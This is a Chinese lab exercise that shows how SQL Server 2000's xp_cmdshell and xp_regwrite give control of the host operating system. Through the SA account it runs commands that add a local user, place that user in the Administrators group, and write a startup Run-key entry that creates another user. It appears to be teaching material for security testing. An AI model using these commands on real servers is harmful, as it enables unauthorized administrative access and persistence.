案例五 几个扩展存储过程的使用
操作准备
已安装好Windows 2003 Server操作系统及SQL Server 2000数据库管理系统的虚拟机。
操作要求
作为公司的数据库管理人员,公司要求对SQL Server数据库的安全性进行检测,要求如下:
看是否能通过SQL Server内置的存储过程xp-cmdshell、xp_regwrite控制系统。
操作步骤
步骤一: 使用xp-cmdshell控制系统
(1) 打开Sql查询分析器,输入要访问的数据库地址(如:192.168.33.192),然后点击确定。如图四31所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=343&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"343","h":"268","dataType":"png","c":"word/media/image1.png","imgOriW":343,"imgOriH":268})
图四31利用SA账户登陆SQL Server服务
(2) 在新开的窗口中输入:xp_cmdshell "dir c:",并按F5执行查询。如图四32所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=418&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"418","h":"116","dataType":"png","c":"word/media/image2.png","imgOriW":418,"imgOriH":116})
图四32执行查询
(3) 查看返回结果,如图四33所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=430&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"430","h":"349","dataType":"png","c":"word/media/image3.png","imgOriW":430,"imgOriH":349})
图四33返回结果
(4) 试图建立新用户。
输入:“xp_cmdshell “net user lipy 111111 /add””,将添加一个lipy用户,密码为111111,如图四34所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=379&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"379","h":"201","dataType":"png","c":"word/media/image4.png","imgOriW":379,"imgOriH":201})
图四34建立新用户
然后,可以输入“xp_cmdshell "net user lipy"”查看用户列表,如图四35所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=411&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"411","h":"561","dataType":"png","c":"word/media/image5.png","imgOriW":411,"imgOriH":561})
图四35用户列表
(5) 将新用户加入管理员组
输入命令“xp_cmdshell "net localgroup administrators lipy /add"”,然后按F5执行查询。如图四36所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=514&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"514","h":"178","dataType":"png","c":"word/media/image6.png","imgOriW":514,"imgOriH":178})
图四36将新用户加入管理员组
然后输入命令“xp_cmdshell "net user lipy"”,检查修改结果,如图四37所示。
![](https://wkrtcs.bdimg.com/rtcs/image?w=486&md5sum=6f793dd4c8b8b66ac00e74701150849e&sign=ed36216271&rtcs_flag=1&rtcs_ver=3.1&l=webapp&bucketNum=33&ipr={"t":"img","w":"486","h":"480","dataType":"png","c":"word/media/image7.png","imgOriW":585,"imgOriH":571})
图四37验证lipy已加入管理员组
步骤二:使用xp_regwrite控制系统
在查询分析器中输入“exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','test','REG_SZ','net user test 123 /add'”即在注册表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”路径下创建了键值“test”,且其值为“net user test 123 /add”。
本文来源:https://www.2haoxitong.net/k/doc/bfbef9c989eb172ded63b7a7.html
文档为doc格式